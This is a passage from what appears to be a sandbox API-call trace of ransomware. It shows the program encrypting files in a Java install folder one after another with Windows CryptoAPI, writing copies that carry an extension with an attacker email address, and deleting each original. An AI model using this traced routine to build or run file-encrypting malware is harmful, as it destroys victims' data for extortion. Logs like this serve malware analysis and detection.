files\\java\\jre1.8.0_144\\bin\\wsdetect.dll")) returned 0x20 [0153.285] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\wsdetect.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.285] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\wsdetect.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.285] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.285] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.285] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\wsdetect.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.285] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3470) returned 1 [0153.285] CryptSetKeyParam (hKey=0xac3470, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.286] ReadFile (in: hFile=0x2dc, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x2f040, lpOverlapped=0x0) returned 1 [0153.290] CryptEncrypt (in: hKey=0xac3470, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x2f050, dwBufLen=0x2f050 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x2f050) returned 1 [0153.290] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x2f050, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x2f050, lpOverlapped=0x0) returned 1 [0153.294] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac34b0) returned 1 [0153.294] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.294] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0153.294] CryptDestroyKey (hKey=0xac34b0) returned 1 [0153.294] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0153.294] CryptDestroyKey (hKey=0xac3470) returned 1 [0153.294] CloseHandle (hObject=0x2dc) returned 1 [0153.294] CloseHandle (hObject=0x2f8) returned 1 [0153.295] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\wsdetect.dll")) returned 1 [0153.297] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.297] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.297] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=77888) returned 1 [0153.297] CloseHandle (hObject=0x2f8) returned 1 [0153.297] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll")) returned 0x20 [0153.297] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.297] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.297] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.297] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.297] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.298] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2d70) returned 1 [0153.298] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.298] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x13040, lpOverlapped=0x0) returned 1 [0153.300] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x13050, dwBufLen=0x13050 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x13050) returned 1 [0153.301] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x13050, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x13050, lpOverlapped=0x0) returned 1 [0153.302] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3070) returned 1 [0153.302] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.302] CryptEncrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x30, dwBufLen=0x30 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x30) returned 1 [0153.302] CryptDestroyKey (hKey=0xac3070) returned 1 [0153.302] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xe2, lpOverlapped=0x0) returned 1 [0153.303] CryptDestroyKey (hKey=0xac2d70) returned 1 [0153.303] CloseHandle (hObject=0x2f8) returned 1 [0153.303] CloseHandle (hObject=0x2dc) returned 1 [0153.303] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll")) returned 1 [0153.304] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.304] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.305] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=3244) returned 1 [0153.305] CloseHandle (hObject=0x2dc) returned 1 [0153.305] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright")) returned 0x20 [0153.305] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.305] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.305] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.305] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.305] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.306] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3030) returned 1 [0153.306] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.306] ReadFile (in: hFile=0x2dc, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xcac, lpOverlapped=0x0) returned 1 [0153.307] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xcb0, dwBufLen=0xcb0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xcb0) returned 1 [0153.307] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xcb0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xcb0, lpOverlapped=0x0) returned 1 [0153.308] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2f30) returned 1 [0153.308] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.308] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0153.308] CryptDestroyKey (hKey=0xac2f30) returned 1 [0153.308] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0153.309] CryptDestroyKey (hKey=0xac3030) returned 1 [0153.309] CloseHandle (hObject=0x2dc) returned 1 [0153.309] CloseHandle (hObject=0x2f8) returned 1 [0153.309] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright")) returned 1 [0153.310] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.310] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.310] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=149) returned 1 [0153.310] CloseHandle (hObject=0x2f8) returned 1 [0153.310] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties")) returned 0x20 [0153.310] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.310] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.310] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.310] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.310] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.311] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac31b0) returned 1 [0153.311] CryptSetKeyParam (hKey=0xac31b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.311] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x95, lpOverlapped=0x0) returned 1 [0153.312] CryptEncrypt (in: hKey=0xac31b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xa0, dwBufLen=0xa0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xa0) returned 1 [0153.312] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xa0, lpOverlapped=0x0) returned 1 [0153.313] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2eb0) returned 1 [0153.313] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.313] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x60, dwBufLen=0x60 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x60) returned 1 [0153.313] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0153.313] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x112, lpOverlapped=0x0) returned 1 [0153.313] CryptDestroyKey (hKey=0xac31b0) returned 1 [0153.313] CloseHandle (hObject=0x2f8) returned 1 [0153.313] CloseHandle (hObject=0x2dc) returned 1 [0153.313] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties")) returned 1 [0153.314] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.314] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.314] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=634) returned 1 [0153.314] CloseHandle (hObject=0x2dc) returned 1 [0153.314] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg")) returned 0x20 [0153.314] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.315] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.315] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.315] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.315] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.315] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2d70) returned 1 [0153.315] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.315] ReadFile (in: hFile=0x2dc, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x27a, lpOverlapped=0x0) returned 1 [0153.458] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x280, dwBufLen=0x280 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x280) returned 1 [0153.458] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x280, lpOverlapped=0x0) returned 1 [0153.459] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac33f0) returned 1 [0153.459] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.459] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x30, dwBufLen=0x30 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x30) returned 1 [0153.459] CryptDestroyKey (hKey=0xac33f0) returned 1 [0153.459] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xe2, lpOverlapped=0x0) returned 1 [0153.459] CryptDestroyKey (hKey=0xac2d70) returned 1 [0153.459] CloseHandle (hObject=0x2dc) returned 1 [0153.459] CloseHandle (hObject=0x2f8) returned 1 [0153.459] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg")) returned 1 [0153.461] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.461] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.461] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=84355) returned 1 [0153.461] CloseHandle (hObject=0x2f8) returned 1 [0153.461] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist")) returned 0x20 [0153.461] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.461] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.461] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.461] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.461] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.462] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2db0) returned 1 [0153.462] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.462] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x14983, lpOverlapped=0x0) returned 1 [0153.465] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x14990, dwBufLen=0x14990 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x14990) returned 1 [0153.465] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x14990, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x14990, lpOverlapped=0x0) returned 1 [0153.467] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac33f0) returned 1 [0153.467] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.467] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0153.467] CryptDestroyKey (hKey=0xac33f0) returned 1 [0153.467] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0153.467] CryptDestroyKey (hKey=0xac2db0) returned 1 [0153.467] CloseHandle (hObject=0x2f8) returned 1 [0153.467] CloseHandle (hObject=0x2dc) returned 1 [0153.468] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist")) returned 1 [0153.469] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.469] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program 